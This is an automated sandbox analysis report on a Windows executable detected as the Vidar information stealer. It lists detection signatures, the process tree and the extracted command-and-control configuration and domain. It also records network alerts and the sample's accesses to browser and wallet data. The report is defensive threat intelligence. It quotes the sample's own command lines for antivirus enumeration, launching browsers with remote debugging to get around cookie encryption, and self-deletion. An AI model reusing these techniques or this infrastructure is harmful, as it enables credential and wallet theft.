Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pM3fQBuTLy.exe

Overview

General Information

Sample name:pM3fQBuTLy.exe
renamed because original name is a hash value
Original sample name:c5f715f9eefa5e42fd10fc3b6e90953b.exe
Analysis ID:1578042
MD5:c5f715f9eefa5e42fd10fc3b6e90953b
SHA1:92ae82a3ce9799e2af542597f9edb94c4ef1d6c5
SHA256:f5ad3ca6464635488824c3e5b6284ca263e7c6417ec854692d839a1c008d5e23
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Performs DNS queries to domains with low reputation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • pM3fQBuTLy.exe (PID: 1092 cmdline: "C:\Users\user\Desktop\pM3fQBuTLy.exe" MD5: C5F715F9EEFA5E42FD10FC3B6E90953B)
    • cmd.exe (PID: 5456 cmdline: "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6856 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5912 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7312 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7320 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7368 cmdline: cmd /c md 325114 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7384 cmdline: findstr /V "Grocery" Pink MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7400 cmdline: cmd /c copy /b ..\Through + ..\Aspects + ..\Except + ..\Prevention d MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Miniature.com (PID: 7416 cmdline: Miniature.com d MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 7788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 8060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2432,i,10762324331143125605,3752248268113785829,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • msedge.exe (PID: 3084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 3744 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2508,i,6938199240973265480,1311617046375224324,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • cmd.exe (PID: 3744 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6124 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 7432 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 2648 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1504 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6048 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6364 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6540 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7532 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1092 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000003.1461652856.0000000004428000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000010.00000003.1461452990.0000000001C0B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000010.00000003.1461172169.000000000443F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              16.2.Miniature.com.170000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

                Sigma Signatures

                Sigma detected: Browser Started with Remote Debugging
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Miniature.com d, ParentImage: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, ParentProcessId: 7416, ParentProcessName: Miniature.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7788, ProcessName: chrome.exe
                Sigma detected: Suspicious Copy From or To System Directory
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\pM3fQBuTLy.exe", ParentImage: C:\Users\user\Desktop\pM3fQBuTLy.exe, ParentProcessId: 1092, ParentProcessName: pM3fQBuTLy.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd, ProcessId: 5456, ProcessName: cmd.exe
                Sigma detected: Use Short Name Path in Command Line
                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit, CommandLine: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Miniature.com d, ParentImage: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, ParentProcessId: 7416, ParentProcessName: Miniature.com, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit, ProcessId: 3744, ProcessName: cmd.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Search for Antivirus process
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5456, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7320, ProcessName: findstr.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:13:20.427564+010020584021A Network Trojan was detected192.168.2.74971194.130.191.168443TCP
                2024-12-19T08:13:22.521418+010020584021A Network Trojan was detected192.168.2.74971294.130.191.168443TCP
                2024-12-19T08:13:24.821968+010020584021A Network Trojan was detected192.168.2.74971394.130.191.168443TCP
                2024-12-19T08:13:27.119770+010020584021A Network Trojan was detected192.168.2.74971494.130.191.168443TCP
                2024-12-19T08:13:29.423259+010020584021A Network Trojan was detected192.168.2.74971594.130.191.168443TCP
                2024-12-19T08:13:31.723358+010020584021A Network Trojan was detected192.168.2.74971694.130.191.168443TCP
                2024-12-19T08:13:32.954374+010020584021A Network Trojan was detected192.168.2.74971794.130.191.168443TCP
                2024-12-19T08:13:40.831957+010020584021A Network Trojan was detected192.168.2.74973694.130.191.168443TCP
                2024-12-19T08:13:41.880678+010020584021A Network Trojan was detected192.168.2.74973794.130.191.168443TCP
                2024-12-19T08:13:43.947680+010020584021A Network Trojan was detected192.168.2.74973994.130.191.168443TCP
                2024-12-19T08:13:45.968071+010020584021A Network Trojan was detected192.168.2.74974094.130.191.168443TCP
                2024-12-19T08:13:46.973345+010020584021A Network Trojan was detected192.168.2.74974194.130.191.168443TCP
                2024-12-19T08:13:53.767368+010020584021A Network Trojan was detected192.168.2.74976094.130.191.168443TCP
                2024-12-19T08:13:54.635958+010020584021A Network Trojan was detected192.168.2.74977094.130.191.168443TCP
                2024-12-19T08:13:56.820152+010020584021A Network Trojan was detected192.168.2.74978994.130.191.168443TCP
                2024-12-19T08:13:58.754131+010020584021A Network Trojan was detected192.168.2.74980794.130.191.168443TCP
                2024-12-19T08:14:00.909391+010020584021A Network Trojan was detected192.168.2.74981694.130.191.168443TCP
                2024-12-19T08:14:02.947261+010020584021A Network Trojan was detected192.168.2.74982594.130.191.168443TCP
                2024-12-19T08:14:05.283778+010020584021A Network Trojan was detected192.168.2.74983294.130.191.168443TCP
                2024-12-19T08:14:06.624975+010020584021A Network Trojan was detected192.168.2.74984294.130.191.168443TCP
                2024-12-19T08:14:08.909675+010020584021A Network Trojan was detected192.168.2.74985094.130.191.168443TCP
                2024-12-19T08:14:11.258987+010020584021A Network Trojan was detected192.168.2.74985494.130.191.168443TCP
                2024-12-19T08:14:14.365988+010020584021A Network Trojan was detected192.168.2.74986394.130.191.168443TCP
                2024-12-19T08:14:17.452513+010020584021A Network Trojan was detected192.168.2.74986594.130.191.168443TCP
                2024-12-19T08:14:19.855709+010020584021A Network Trojan was detected192.168.2.74986894.130.191.168443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:13:18.190912+010020584011A Network Trojan was detected192.168.2.7495321.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:13:28.014169+010020442471Malware Command and Control Activity Detected94.130.191.168443192.168.2.749714TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:13:30.307549+010020518311Malware Command and Control Activity Detected94.130.191.168443192.168.2.749715TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:13:30.307378+010020490871A Network Trojan was detected192.168.2.74971594.130.191.168443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:13:23.416803+010028593781Malware Command and Control Activity Detected192.168.2.74971294.130.191.168443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://hulkpara.xyz/Avira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Multi AV Scanner detection for submitted file
                Source: pM3fQBuTLy.exeVirustotal: Detection: 9%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.7% probability
                Source: pM3fQBuTLy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49737 version: TLS 1.2
                Source: pM3fQBuTLy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C7DC54
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C8A087
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C8A1E2
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00C7E472
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00C8A570
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C866DC FindFirstFileW,FindNextFileW,FindClose,16_2_00C866DC
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C4C622 FindFirstFileExW,16_2_00C4C622
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00C873D4
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C87333 FindFirstFileW,FindClose,16_2_00C87333
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C7D921
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: chrome.exeMemory has grown: Private usage: 1MB later: 29MB

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058401 - Severity 1 - ET MALWARE StealC/Vidar CnC Domain in DNS Lookup (hulkpara .xyz) : 192.168.2.7:49532 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49714 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49713 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49712 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49715 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49717 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49711 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49736 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49716 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49741 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49740 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49737 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49770 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49760 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49739 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49807 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49789 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49816 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49825 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49832 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49842 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49850 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49854 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49863 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49865 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49868 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.7:49715 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.191.168:443 -> 192.168.2.7:49715
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.191.168:443 -> 192.168.2.7:49714
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.7:49712 -> 94.130.191.168:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Performs DNS queries to domains with low reputation
                Source: DNS query: hulkpara.xyz
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
